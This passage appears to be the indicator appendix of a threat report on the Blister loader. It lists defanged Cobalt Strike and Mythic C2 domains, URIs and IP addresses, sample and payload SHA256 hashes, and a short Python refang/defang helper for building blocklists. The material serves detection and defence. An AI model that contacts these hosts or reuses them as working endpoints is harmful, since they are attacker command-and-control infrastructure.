1101991775 | steveandzina[.]com | /safebrowsing/d4alBmGBO/mr3lHbohEvZa0mKDWWdwTV5Flsxh
1101991775 | steveandzina[.]com | /safebrowsing/d4alBmGBO/YwTM1CK0mBV1Y7UDagpjP
1101991775 | websterbarn[.]com | /safebrowsing/fDeBjO/CGZcHKnX3arVCfFp98k8
1580103824 | 10.158.128[.]50 |
1580103824 | bimelectrical[.]com | /safebrowsing/7IAMO/hxNTeZ8lBNYqjAsQ2tBRS
1580103824 | bimelectrical[.]com | /safebrowsing/7IAMO/Jwee0NMJNKn9sDD8sUEem4g8jcB2v44UINpCIj
1580103824 | bookmark-tag[.]com | /safebrowsing/eMUgI4Z/3RzgDBAvgg3DQUn8XtN8l
1580103824 | braprest[.]com | /safebrowsing/d5pERENa/3tPCoNwoGwXAvV1w1JAS-OOPyVYxL1K2styHFtbXar7ME
1580103824 | change-land[.]com | /safebrowsing/TKc3hA/DzwHHcc8y8O9kAS7cl4SDK0e6z0KHKIX9w7
1580103824 | change-land[.]com | /safebrowsing/TKc3hA/nLTHCIhzOKpdFp0GFHYBK-0bRwdNDlZz6Qc
1580103824 | clippershipintl[.]com | /safebrowsing/sj0IWAb/YhcZADXFB3NHbxFtKgpqBtK9BllJiGEL
1580103824 | couponbrothers[.]com | /safebrowsing/Jwjy4/mzAoZyZk7qHIyw3QrEpXij5WFhIo1z8JDUVA0N0
1580103824 | electronic-infinity[.]com | /safebrowsing/TKc3hA/t-nAkENGu9rpZ9ebRRXr79b
1580103824 | final-work[.]com | /safebrowsing/AvuvAkxsR/8I6ikMUvdNd8HOgMeD0sPfGpwSZEMr
1580103824 | geotypico[.]com | /safebrowsing/d5pERENa/f5oBhEk7xS3cXxstp6Kx1G7u3N546UStcg9nEnzJn2k
1580103824 | imsensors[.]com | /safebrowsing/eMUgI4Z/BOhKRIMsJsuPnn3IQvgrEc3XLQUB3W
1580103824 | intradayinvestment[.]com | /safebrowsing/dpNqi/nXeFgGufr9VqHjDdsIZbw-ZH0
1580103824 | medicare-cost[.]com | /safebrowsing/dpNqi/F3QExtY65SvTVK1ewA26
1580103824 | optiontradingsignal[.]com | /safebrowsing/dpNqi/7CtHhF-isMMQ6m7NmHYNb0N7E7Fe
1580103824 | setechnowork[.]com | /safebrowsing/fBm1b/JbcKDYjMWcQNjn69LnGggFe6mpjn5xOQ
1580103824 | sikescomposites[.]com | /safebrowsing/Jwjy4/cmr4tZ7IyFGbgCiof2tHMO
1580103824 | technicollit[.]com | /safebrowsing/b0kKKIjr/AzX9ZHB37oJfPsUBUaxBJjzzi132cYRZhUZc81g
1580103824 | wasfatsahla[.]com | /safebrowsing/IsXNCJJfH/5x0rUIrn–r85sLJIuEY7C9q
206546002 | smutlr[.]com | /functionalStatus/qPprp9dtVhrGV3R3re5Xy4M2cfQo4wB
206546002 | spanish-home-sales[.]com | /functionalStatus/fb8ClEdmm-WwYudk-zODoQYB7DX3wQYR
Table 3, Information on observed Cobalt Strike beacons dropped by Blister.

BlisterMythic agents

Domain | URI
139-177-202-78.ip.linodeusercontent[.]com | /etc.clientlibs/sapdx/front-layer/dist/resources/sapcom/919.9853a7ee629d48b1ddbe.js
23-92-30-58.ip.linodeusercontent[.]com | /etc.clientlibs/sapdx/front-layer/dist/resources/sapcom/919.9853a7ee629d48b1ddbe.js
aviditycellars[.]com | /etc.clientlibs/sapdx/front-layer/dist/resources/sapcom/919.9853a7ee629d48b1ddbe.js
boxofficeseer[.]com | /s/0.7.8/clarity.js
d1hp6ufzqrj3xv.cloudfront[.]net | /organizations/oauth2/v2.0/authorize
makethumbmoney[.]com | /s/0.7.8/clarity.js
rosevalleylimousine[.]com | /login.sophos.com/B2C_1A_signup_signin/api/SelfAsserted/confirmed
Table 4, Information on observed Mythic agents dropped by Blister.

BlisterMythic C2 servers

IP | Domain
37.1.215[.]57 | angelbusinessteam[.]com
92.118.112[.]100 | danagroupegypt[.]com
104.238.60[.]11 | shchiswear[.]com
172.233.238[.]215 | N/a
96.126.111[.]127 | N/a
23.239.11[.]145 | N/a
45.33.98[.]254 | N/a
45.79.199[.]4 | N/a
45.56.105[.]98 | N/a
149.154.158[.]243 | futuretechfarm[.]com
104.243.33[.]161 | sms-atc[.]com
104.243.33[.]129 | makethumbmoney[.]com
138.124.180[.]241 | vectorsandarrows[.]com
94.131.101[.]58 | pacatman[.]com
198.58.119[.]214 | N/a
185.174.101[.]53 | personmetal[.]com
185.45.195[.]30 | aviditycellars[.]com
185.250.151[.]145 | bureaudecreationalienor[.]com
23.227.194[.]115 | bitscoinc[.]com
88.119.175[.]140 | boxofficeseer[.]com
88.119.175[.]137 | thesheenterprise[.]com
37.1.214[.]162 | remontisto[.]com
45.66.248[.]99 | N/a
88.119.175[.]104 | visioquote[.]com
45.66.248[.]13 | cannabishang[.]com
92.118.112[.]8 | turanmetal[.]com
37.1.211[.]150 | lucasdoors[.]com
185.72.8[.]219 | displaymercials[.]com
172.232.172[.]128 | N/a
82.117.253[.]168 | digtupu[.]com
104.238.60[.]112 | avblokhutten[.]com
173.44.141[.]34 | hom4u[.]com
170.130.165[.]140 | rosevalleylimousine[.]com
172.232.172[.]110 | N/a
5.8.63[.]79 | boezgrt[.]com
172.232.172[.]125 | N/a
162.248.224[.]56 | hatchdesignsnh[.]com
185.174.101[.]13 | formulaautoparts[.]com
23.152.0[.]193 | ivermectinorder[.]com
192.169.6[.]200 | szdeas[.]com
194.87.32[.]85 | licencesolutions[.]com
185.45.195[.]205 | motorrungoli[.]com
Table 5, Detected BlisterMythic C2 servers.
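The indicators in the tables above are defanged with the common "[.]" convention. A minimal helper for refanging them before feeding them into blocklists or enrichment tooling (a sketch that assumes only this defanging style):

```python
def refang(indicator: str) -> str:
    """Turn a defanged indicator such as '37.1.215[.]57' back into '37.1.215.57'."""
    return indicator.replace("[.]", ".")

def defang(indicator: str) -> str:
    """Defang an indicator for safe sharing; unlike the tables above,
    this simple variant brackets every dot, not just the last one."""
    return indicator.replace(".", "[.]")
```

For example, refang("angelbusinessteam[.]com") returns "angelbusinessteam.com".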

Blister samples

SHA256 | Payload family | Payload SHA256
0a73a9ee3650821352d9c4b46814de8f73fde659cae6b82a11168468becb68d1Cobalt Strike397c08f5cdc59085a48541c89d23a8880d41552031955c4ba38ff62e57cfd803
0bbf1a3a8dd436fda213bc126b1ad0b8704d47fd8f14c75754694fd47a99526cBlisterMythicab7cab5192f0bef148670338136b0d3affe8ae0845e0590228929aef70cb9b8b
0e8458223b28f24655caf37e5c9a1c01150ac7929e6cb1b11d078670da892a5bCobalt Strike4420bd041ae77fce2116e6bd98f4ed6945514fad8edfbeeeab0874c84054c80a
0f07c23f7fe5ff918ee596a7f1df320ed6e7783ff91b68c636531aba949a6f33Test application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
a3cb53ddd4a5316cb02b7dc4ccd1f615755b46e86a88152a1f8fc59efe170497Cobalt Strikee85a2e8995ef37acf15ea79038fae70d4566bd912baac529bad74fbec5bb9c21
a403b82a14b392f8485a22f105c00455b82e7b8a3e7f90f460157811445a8776Cobalt Strikee0c0491e45dda838f4ac01b731dd39cc7064675a6e1b79b184fff99cdce52f54
a5fc8d9f9f4098e2cecb3afc66d8158b032ce81e0be614d216c9deaf20e888acTest application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
a9ea85481e178cd35ae323410d619e97f49139dcdb2e7da72126775a89a8464fCobalt Strikec7accad7d8da9797788562a3de228186290b0f52b299944bec04a95863632dc0
ac232e7594ce8fbbe19fc74e34898c562fe9e8f46d4bfddc37aefeb26b85c02bCobalt Strike obfuscated shellcodecef1a88dfc436dab9ae104f0770a434891bbd609e64df43179b42b03a7e8f908
acdaac680e2194dd8fd06f937847440e7ab83ce1760eab028507ee8eba557291Cobalt Strikeb96d4400e9335d80dedee6f74ffaa4eca9ffce24c370790482c639df52cb3127
ae148315cec7140be397658210173da372790aa38e67e7aa51597e3e746f2cb2Cobalt Strikef245b2bc118c3c20ed96c8a9fd0a7b659364f9e8e2ee681f5683681e93c4d78b
aeecc65ac8f0f6e10e95a898b60b43bf6ba9e2c0f92161956b1725d68482721dCobalt Strike797abd3de3cb4c7a1ceb5de5a95717d84333bedcbc0d9e9776d34047203181bc
b062dd516cfa972993b6109e68a4a023ccc501c9613634468b2a5a508760873eCobalt Strike122b77fd4d020f99de66bba8346961b565e804a3c29d0757db807321e9910833
b10db109b64b798f36c717b7a050c017cf4380c3cb9cfeb9acd3822a68201b5bCobalt Strike902d29871d3716113ca2af5caa6745cb4ab9d0614595325c1107fb83c1494483
b1d1a972078d40777d88fb4cd6aef1a04f29c5dd916f30a6949b29f53a2d121cPutty0581160998be30f79bd9a0925a01b0ebc4cb94265dfa7f8da1e2839bf0f1e426
b1f3f1c06b1cc9a249403c2863afc132b2d6a07f137166bdd1e4863a0cece5b1Cobalt Strikee63807daa9be0228d90135ee707ddf03b0035313a88a78e50342807c27658ff2
b4c746e9a49c058ae3843799cdd6a3bb5fe14b413b9769e2b5a1f0f846cb9d37Cobalt Strike stager063191c49d49e6a8bdcd9d0ee2371fb1b90f1781623827b1e007e520ec925445
b4f37f13a7e9c56ea95fa3792e11404eb3bdb878734f1ca394ceed344d22858fTest application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
b956c5e8ec6798582a68f24894c1e78b9b767aae4d5fb76b2cc71fc9c8befed8Cobalt Strike6fc283acfb7dda7bab02f5d23dc90b318f4c73a8e576f90e1cac235bf8d02470
b99ba2449a93ab298d2ec5cacd5099871bacf6a8376e0b080c7240c8055b1395Cobalt Strike96fab57ef06b433f14743da96a5b874e96d8c977b758abeeb0596f2e1222b182
b9e313e08b49d8d2ffe44cb6ec2192ee3a1c97b57c56f024c17d44db042fb9ebTest application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
bc238b3b798552958009f3a4ce08e5ce96edff06795281f8b8de6f5df9e4f0feCobalt Strike stager191566d8cc119cd6631d353eab0b8c1b8ba267270aa88b5944841905fa740335
bcd64a8468762067d8a890b0aa7916289e68c9d8d8f419b94b78a19f5a74f378Putty0581160998be30f79bd9a0925a01b0ebc4cb94265dfa7f8da1e2839bf0f1e426
c113e8a1c433b4c67ce9bce5dea4b470da95e914de4dc3c3d5a4f98bce2b7d6cPutty0581160998be30f79bd9a0925a01b0ebc4cb94265dfa7f8da1e2839bf0f1e426
c1261f57a0481eb5d37176702903025c5b01a166ea6a6d42e1c1bdc0e5a0b04bCobalt Strike obfuscated shellcode189b7afdd280d75130e633ebe2fcf8f54f28116a929f5bb5c9320f11afb182d4
c149792a5e5ce4c15f8506041e2f234a9a9254dbda214ec79ceef7d0911a3095Putty0581160998be30f79bd9a0925a01b0ebc4cb94265dfa7f8da1e2839bf0f1e426
c2046d64bcfbab5afcb87a75bf3110e0fa89b3e0f7029ff81a335911cf52f00aCobalt Striked048001f09ad9eedde44f471702a2a0f453c573db9c8811735ec45d65801f1d0
c3509ba690a1fcb549b95ad4625f094963effc037df37bd96f9d8ed5c7136d94Cobalt Strikee0c0491e45dda838f4ac01b731dd39cc7064675a6e1b79b184fff99cdce52f54
c3cfbede0b561155062c2f44a9d44c79cdb78c05461ca50948892ff9a0678f3fCobalt Strikebcb32a0f782442467ea8c0bf919a28b58690c68209ae3d091be87ef45d4ef049
c79ab271d2abd3ee8c21a8f6ad90226e398df1108b4d42dc551af435a124043cCobalt Strike749d061acb0e584df337aaef26f3b555d5596a96bfffc9d6cd7421e22c0bacea
cab95dc6d08089dcd24c259f35b52bca682635713c058a74533501afb94ab91fPutty0581160998be30f79bd9a0925a01b0ebc4cb94265dfa7f8da1e2839bf0f1e426
cea5c060dd8abd109b478e0de481f0df5ba3f09840746a6a505374d526bd28dcMythicPacker759ac6e54801e7171de39e637b9bb525198057c51c1634b09450b64e8ef47255
cfa604765b9d7a93765d46af78383978251486d9399e21b8e3da4590649c53e4Cobalt Strike stager57acdb7a22f5f0c6d374be2341dbef97efbcc61f633f324beb0e1214614fef82
d1afca36f67b24eae7f2884c27c812cddc7e02f00f64bb2f62b40b21ef431084Cobalt Strikef570bd331a3d75e065d1825d97b922503c83a52fc54604d601d2e28f4a70902b
d1b6671fc0875678ecf39d737866d24aca03747a48f0c7e8855a5b09fc08712dTest application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
d3d48aa32b062b6e767966a8bab354eded60e0a11be5bc5b7ad8329aa5718c76Cobalt Strike60905c92501ec55883afc3f6402a05bddfd335323fdc0144515f01e8da0acbda
d3eab2a134e7bd3f2e8767a6285b38d19cd3df421e8af336a7852b74f194802cBlisterMythic2fd38f6329b9b2c5e0379a445e81ece43fe0372dec260c1a17eefba6df9ffd55
d439f941b293e3ded35bf52fac7f20f6a2b7f2e4b189ad2ac7f50b8358110491Cobalt Strike18a9eafb936bf1d527bd4f0bfae623400d63671bafd0aad0f72bfb59beb44d5f
dac00ec780aabaffed1e89b3988905a7f6c5c330218b878679546a67d7e0eef2Cobalt Strikeadc73af758c136e5799e25b4d3d69e462e090c8204ec8b8f548e36aac0f64a66
db62152fe9185cbd095508a15d9008b349634901d37258bc3939fe3a563b4b3cMythicPacker7f71d316c197e4e0aa1fce9d40c6068ada4249009e5da51479318de039973ad8
db81e91fc05991f71bfd5654cd60b9093c81d247ccd8b3478ab0ebef61efd2adPutty0581160998be30f79bd9a0925a01b0ebc4cb94265dfa7f8da1e2839bf0f1e426
dd42c1521dbee54173be66a5f98a811e5b6ee54ad1878183c915b03b68b7c9bbCobalt Striked988a867a53c327099a4c9732a1e4ced6fe6eca5dd68f67e5f562ab822b8374b
e0888b80220f200e522e42ec2f15629caa5a11111b8d1babff509d0da2b948f4Cobalt Strike915503b4e985ab31bc1d284f60003240430b3bdabb398ae112c4bd1fe45f3cdd
e30503082d3257737bba788396d7798e27977edf68b9dba7712a605577649ffbCobalt Strikedf01b0a8112ca80daf6922405c3f4d1ff7a8ff05233fc0786e9d06e63c9804d6
e521cad48d47d4c67705841b9c8fa265b3b0dba7de1ba674db3a63708ab63201Cobalt Strike stager40cac28490cddfa613fd58d1ecc8e676d9263a46a0ac6ae43bcbdfedc525b8ee
e62f5fc4528e323cb17de1fa161ad55eb451996dec3b31914b00e102a9761a52Cobalt Strike19e7bb5fa5262987d9903f388c4875ff2a376581e4c28dbf5ae7d128676b7065
ebafb35fd9c7720718446a61a0a1a10d09bf148d26cdcd229c1d3d672835335cCobalt Strike5cb2683953b20f34ff26ddc0d3442d07b4cd863f29ec3a208cbed0dc760abd04
ebf40e12590fcc955b4df4ec3129cd379a6834013dae9bb18e0ec6f23f935bbaCobalt Striked99bac48e6e347fcfd56bbf723a73b0b6fb5272f92a6931d5f30da76976d1705
ef7ff2d2decd8e16977d819f122635fcd8066fc8f49b27a809b58039583768d2Cobalt Strikeadc73af758c136e5799e25b4d3d69e462e090c8204ec8b8f548e36aac0f64a66
efbffc6d81425ffb0d81e6771215c0a0e77d55d7f271ec685b38a1de7cc606a8Cobalt Strike47bd5fd96c350f5e48f5074ebee98e8b0f4efb8a0cd06db5af2bdc0f3ee6f44f
f08fdb0633d018c0245d071fa79cdc3915da75d3c6fc887a5ca6635c425f163aTest application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
f3bfd8ab9e79645babf0cb0138d51368fd452db584989c4709f613c93caf2bdcCobalt Strikecd7135c94929f55e19e5d66359eab46422c3c59d794dde00c8b4726498e4e01a
f58de1733e819ea38bce21b60bb7c867e06edb8d4fd987ab09ecdbf7f6a319b9MythicPacker19eae7c0b7a1096a71b595befa655803c735006d75d5041c0e18307bd967dee6
f7fa532ad074db4a39fd0a545278ea85319d08d8a69c820b081457c317c0459eCobalt Strike902d29871d3716113ca2af5caa6745cb4ab9d0614595325c1107fb83c1494483
fce9de0a0acf2ba65e9e252a383d37b2984488b6a97d889ec43ab742160acce1Cobalt Strike stager40cac28490cddfa613fd58d1ecc8e676d9263a46a0ac6ae43bcbdfedc525b8ee
ffb255e7a2aa48b96dd3430a5177d6f7f24121cc0097301f2e91f7e02c37e6bfCobalt Strike5af6626a6bc7265c21adaffb23cc58bc52c4ebfe5bf816f77711d3bc7661c3d6
1a50c358fa4b725c6e0e26eee3646de26ba38e951f3fe414f4bf73532af62455Cobalt Strike8f1cc6ab8e95b9bfdf22a2bde77392e706b6fb7d3c1a3711dbc7ccd420400953
1be3397c2a85b4b9a5a111b9a4e53d382df47a0a09065639d9e66e0b55fe36fcCobalt Strike stager3f28a055d56f46559a21a2b0db918194324a135d7e9c44b90af5209a2d2fd549
1d058302d1e747714cac899d0150dcc35bea54cc6e995915284c3a64a76aacb1Putty0581160998be30f79bd9a0925a01b0ebc4cb94265dfa7f8da1e2839bf0f1e426
02b1bd89e9190ff5edfa998944fd6048d32a3bde3a72d413e8af538d9ad770b4Cobalt Strike obfuscated shellcode3760db55a6943f4216f14310ab10d404e5c0a53b966dd634b76dd669f59d2507
2cf125d6f21c657f8c3732be435af56ccbe24d3f6a773b15eccd3632ea509b1aPutty0581160998be30f79bd9a0925a01b0ebc4cb94265dfa7f8da1e2839bf0f1e426
2f2e62c9481ba738a5da7baadfc6d029ef57bf7a627c2ac0b3e615cab5b0cfa2Cobalt Strike39ed516d8f9d9253e590bad7c5daecce9df21f1341fb7df95d7caa31779ea40f
3bc8ce92409876526ad6f48df44de3bd1e24a756177a07d72368e2d8b223bb39Cobalt Strike20e43f60a29bab142f050fab8c5671a0709ee4ed90a6279a80dd850e6f071464
3dffb7f05788d981efb12013d7fadf74fdf8f39fa74f04f72be482847c470a53Cobalt Strike8e78ad0ef549f38147c6444910395b053c533ac8fac8cdaa00056ad60b2a0848
3f6e3e7747e0b1815eb2a46d79ebd8e3cb9ccdc7032d52274bc0e60642e9b31ePutty0581160998be30f79bd9a0925a01b0ebc4cb94265dfa7f8da1e2839bf0f1e426
3fff407bc45b879a1770643e09bb99f67cdcfe0e4f7f158a4e6df02299bac27eTest application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
4b3cd3aa5b961791a443b89e281de1b05bc3a9346036ec0da99b856ae7dc53a8Putty0581160998be30f79bd9a0925a01b0ebc4cb94265dfa7f8da1e2839bf0f1e426
4faf362b3fe403975938e27195959871523689d0bf7fba757ddfa7d00d437fd4Cobalt Strike60905c92501ec55883afc3f6402a05bddfd335323fdc0144515f01e8da0acbda
5d72cc2e47d3fd781b3fc4e817b2d28911cd6f399d4780a5ff9c06c23069eae1MythicPacker9a08d2db7d0bd7d4251533551d4def0f5ee52e67dff13a2924191c8258573024
5ea74bca527f7f6ea8394d9d78e085bed065516eca0151a54474fffe91664198Cobalt Strikebe314279f817f9f000a191efb8bcc2962fcc614b1f93c73dda46755269de404f
5fc79a4499bafa3a881778ef51ce29ef015ee58a587e3614702e69da304395dbBlisterMythic3d2499e5c9b46f1f144cfbbd4a2c8ca50a3c109496a936550cbb463edf08cd79
06cd6391b5fcf529168dc851f27bf3626f20e038a9c0193a60b406ad1ece6958Test application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
6a7ae217394047c17d56ec77b2243d9b55617a1ff591d2c2dfc01f2da335cbbfMythicPacker1e3b373f2438f1cc37e15fdede581bdf2f7fc22068534c89cb4e0c128d0e45dd
6e75a9266e6bbfd194693daf468dd86d106817706c57b1aad95d7720ac1e19e3Cobalt Strike4adf3875a3d8dd3ac4f8be9c83aaa7e3e35a8d664def68bc41fc539bfedfd33f
7e61498ec5f0780e0e37289c628001e76be88f647cad7a399759b6135be8210aTest application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
7f7b9f40eea29cfefc7f02aa825a93c3c6f973442da68caf21a3caae92464127Putty0581160998be30f79bd9a0925a01b0ebc4cb94265dfa7f8da1e2839bf0f1e426
8b6eb2853ae9e5faff4afb08377525c9348571e01a0e50261c7557d662b158e1Test application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
8d53dc0857fa634414f84ad06d18092dedeb110689a08426f08cb1894c2212d4Putty0581160998be30f79bd9a0925a01b0ebc4cb94265dfa7f8da1e2839bf0f1e426
8e6c0d338f201630b5c5ba4f1757e931bc065c49559c514658b4c2090a23e57bCobalt Strikef2329ae2eb28bba301f132e5923282b74aa7a98693f44425789b18a447a33bff
8f9289915b3c6f8bf9a71d0a2d5aeb79ff024c108c2a8152e3e375076f3599d5BlisterMythicf89cfbc1d984d01c57dd1c3e8c92c7debc2beb5a2a43c1df028269a843525a38
9c5c9d35b7c2c448a610a739ff7b85139ea1ef39ecd9f51412892cd06fde4b1bTest application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
13c7f28044fdb1db2289036129b58326f294e76e011607ca8d4c5adc2ddddb16Cobalt Strike19e7bb5fa5262987d9903f388c4875ff2a376581e4c28dbf5ae7d128676b7065
19b0db9a9a08ee113d667d924992a29cd31c05f89582953eff5a52ad8f533f4bTest application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
19d4a7d08176119721b9a302c6942718118acb38dc1b52a132d9cead63b11210Test application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
22e65a613e4520a6f824a69b795c9f36af02247f644e50014320857e32383209Cobalt Strike18a9eafb936bf1d527bd4f0bfae623400d63671bafd0aad0f72bfb59beb44d5f
028da30664cb9f1baba47fdaf2d12d991dcf80514f5549fa51c38e62016c1710Cobalt Strike8e78ad0ef549f38147c6444910395b053c533ac8fac8cdaa00056ad60b2a0848
37b6fce45f6bb52041832eaf9c6d02cbc33a3ef2ca504adb88e19107d2a7aeaaCobalt Strike902d29871d3716113ca2af5caa6745cb4ab9d0614595325c1107fb83c1494483
42beac1265e0efc220ed63526f5b475c70621573920968a457e87625d66973afTest application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
43c1ee0925ecd533e0b108c82b08a3819b371182e93910a0322617a8acf26646Cobalt Strike5cb2683953b20f34ff26ddc0d3442d07b4cd863f29ec3a208cbed0dc760abd04
44ce7403ca0c1299d67258161b1b700d3fa13dd68fbb6db7565104bba21e97aeMythicPackerf3b0357562e51311648684d381a23fa2c1d0900c32f5c4b03f4ad68f06e2adc1
49ba10b4264a68605d0b9ea7891b7078aeef4fa0a7b7831f2df6b600aae77776Cobalt Strike0603cf8f5343723892f08e990ae2de8649fcb4f2fd4ef3a456ef9519b545ed9e
54c7c153423250c8650efc0d610a12df683b2504e1a7a339dfd189eda25c98d4Test application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
58fdee05cb962a13c5105476e8000c873061874aadbc5998887f0633c880296aTest application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
73baa040cd6879d1d83c5afab29f61c3734136bffe03c72f520e025385f4e9a2Cobalt Strike17392d830935cfad96009107e8b034f952fb528f226a9428718669397bafd987
78d93b13efd0caa66f5d91455028928c3b1f44d0f2222d9701685080e30e317dPutty0581160998be30f79bd9a0925a01b0ebc4cb94265dfa7f8da1e2839bf0f1e426
83c121db96d99f0d99b9e7a2384386f3f6debcb01d977c4ddca5bcdf2c6a2daaCobalt Strike stager39323f9c0031250414cb4683662e1c533960dea8a54d7a700f77c6133a59c783
84b245fce9e936f1d0e15d9fca8a1e4df47c983111de66fcc0ad012a63478c8dCobalt Strike stagerd961e9db4a96c87226dbc973658a14082324e95a4b30d4aae456a8abe38f5233
84b2d16124b690d77c5c43c3a0d4ad78aaf10d38f88d9851de45d6073d8fcb65Cobalt Strike0091186459998ad5b699fdd54d57b1741af73838841c849c47f86601776b0b33
85d3f81a362a3df9ba2f0a00dd12cd654e55692feffc58782be44f4c531d9bb9Putty0581160998be30f79bd9a0925a01b0ebc4cb94265dfa7f8da1e2839bf0f1e426
96e8b44ec061c49661bd192f279f7b7ba394d03495a2b46d3b37dcae0f4892f1Cobalt Strike stager6f7d7da247cac20d5978f1257fdd420679d0ce18fd8738bde02246129f93841b
96ebacf48656b804aed9979c2c4b651bbb1bc19878b56bdf76954d6eff8ad7caCobalt Striked988a867a53c327099a4c9732a1e4ced6fe6eca5dd68f67e5f562ab822b8374b
Blister sample SHA256 | Payload | Payload SHA256
113c9e7760da82261d77426d9c41bc108866c45947111dbae5cd3093d69e0f1d | Putty | 0581160998be30f79bd9a0925a01b0ebc4cb94265dfa7f8da1e2839bf0f1e426
149c3d044abc3c3a15ba1bb55db7e05cbf87008bd3d23d7dd4a3e31fcfd7af10 | Cobalt Strike | e63807daa9be0228d90135ee707ddf03b0035313a88a78e50342807c27658ff2
307fc7ebde82f660950101ea7b57782209545af593d2c1115c89f328de917dbb | Cobalt Strike stager | 40cac28490cddfa613fd58d1ecc8e676d9263a46a0ac6ae43bcbdfedc525b8ee
356efe6b10911d7daaffed64278ba713ab51f7130d1c15f3ca86d17d65849fa5 | Test application | 43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
394ce0385276acc6f6c173a3dde6694881130278bfb646be94234cc7798fd9a9 | Cobalt Strike | 60e2fe4eb433d3f6d590e75b2a767755146aca7a9ba6fd387f336ccb3c5391f8
396dce335b16111089a07ecb2d69827f258420685c2d9f3ea9e1deee4bff9561 | Test application | 43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
541eab9e348c40d510db914387068c6bfdf46a6ff84364fe63f6e114af8d79cf | Cobalt Strike stager | 4e2a011922e0060f995bfde375d75060bed00175dc291653445357b29d1afc38
745a3dcdda16b93fedac8d7eefd1df32a7255665b8e3ee71e1869dd5cd14d61c | Cobalt Strike obfuscated shellcode | cef1a88dfc436dab9ae104f0770a434891bbd609e64df43179b42b03a7e8f908
753f77134578d4b941b8d832e93314a71594551931270570140805675c6e9ad3 | Putty | 0581160998be30f79bd9a0925a01b0ebc4cb94265dfa7f8da1e2839bf0f1e426
863de84a39c9f741d8103db83b076695d0d10a7384e4e3ba319c05a6018d9737 | Cobalt Strike | 3a1e65d7e9c3c23c41cb1b7d1117be4355bebf0531c7473a77f957d99e6ad1d4
902fa7049e255d5c40081f2aa168ac7b36b56041612150c3a5d2b6df707a3cff | Cobalt Strike | 397c08f5cdc59085a48541c89d23a8880d41552031955c4ba38ff62e57cfd803
927e04371fa8b8d8a1de58533053c305bb73a8df8765132a932efd579011c375 | Cobalt Strike | 2e0767958435dd4d218ba0bc99041cc9f12c9430a09bb1222ac9d1b7922c2632
2043d7f2e000502f69977b334e81f307e2fda742bbc5b38745f6c1841757fddc | Test application | 43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
02239cac2ff37e7f822fd4ee57ac909c9f541a93c27709e9728fef2000453afe | Cobalt Strike | 18a9eafb936bf1d527bd4f0bfae623400d63671bafd0aad0f72bfb59beb44d5f
4257bf17d15358c2f22e664b6112437b0c2304332ff0808095f1f47cf29fc1a2 | Cobalt Strike | 3a1e65d7e9c3c23c41cb1b7d1117be4355bebf0531c7473a77f957d99e6ad1d4
6558ac814046ecf3da8c69affea28ce93524f93488518d847e4f03b9327acb44 | Test application | 43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
8450ed10b4bef6f906ff45c66d1a4a74358d3ae857d3647e139fdaf0e3648c10 | BlisterMythic | ab7cab5192f0bef148670338136b0d3affe8ae0845e0590228929aef70cb9b8b
9120f929938cd629471c7714c75d75d30daae1f2e9135239ea5619d77574c1fe | Cobalt Strike | 647e992e24e18c14099b68083e9b04575164ed2b4f5069f33ff55f84ee97fff0
28561f309d208e885a325c974a90b86741484ba5e466d59f01f660bed1693689 | Cobalt Strike | 397c08f5cdc59085a48541c89d23a8880d41552031955c4ba38ff62e57cfd803
30628bcb1db7252bf710c1d37f9718ac37a8e2081a2980bead4f21336d2444bc | Cobalt Strike obfuscated shellcode | 13f23b5db4a3d0331c438ca7d516d565a08cac83ae515a51a7ab4e6e76b051b1
53121c9c5164d8680ae1b88d95018a553dff871d7b4d6e06bd69cbac047fe00f | Cobalt Strike | 902d29871d3716113ca2af5caa6745cb4ab9d0614595325c1107fb83c1494483
67136ab70c5e604c6817105b62b2ee8f8c5199a647242c0ddbf261064bb3ced3 | Cobalt Strike obfuscated shellcode | 0aecd621b386126459b39518f157ee240866c6db1885780470d30a0ebf298e16
79982f39ea0c13eeb93734b12f395090db2b65851968652cab5f6b0827b49005 | MythicPacker | 152455f9d970f900eb237e1fc2c29ac4c72616485b04e07c7e733b95b6afc4d8
87269a95b1c0e724a1bfe87ddcb181eac402591581ee2d9b0f56dedbaac04ff8 | Cobalt Strike | f3d42e4c1a47f0e1d3812d5f912487d04662152c17c7aa63e836bef01a1a4866
89196b39a0edebdf2026053cb4e87d703b9942487196ff9054ef775fdcad1899 | Test application | 43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
91446c6d3c11074e6ff0ff42df825f9ffd5f852c2e6532d4b9d8de340fa32fb8 | Test application | 43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
96823bb6befe5899739bd69ab00a6b4ae1256fd586159968301a4a69d675a5ec | Cobalt Strike | 3b3bdd819f4ee8daa61f07fc9197b2b39d0434206be757679c993b11acc8d05f
315217b860ab46c6205b36e49dfaa927545b90037373279723c3dec165dfaf11 | Cobalt Strike | 96fab57ef06b433f14743da96a5b874e96d8c977b758abeeb0596f2e1222b182
427481ab85a0c4e03d1431a417ceab66919c3e704d7e017b355d8d64be2ccf41 | Putty | 0581160998be30f79bd9a0925a01b0ebc4cb94265dfa7f8da1e2839bf0f1e426
595153eb56030c0e466cda0becb1dc9560e38601c1e0803c46e7dfc53d1d2892 | Cobalt Strike | f245b2bc118c3c20ed96c8a9fd0a7b659364f9e8e2ee681f5683681e93c4d78b
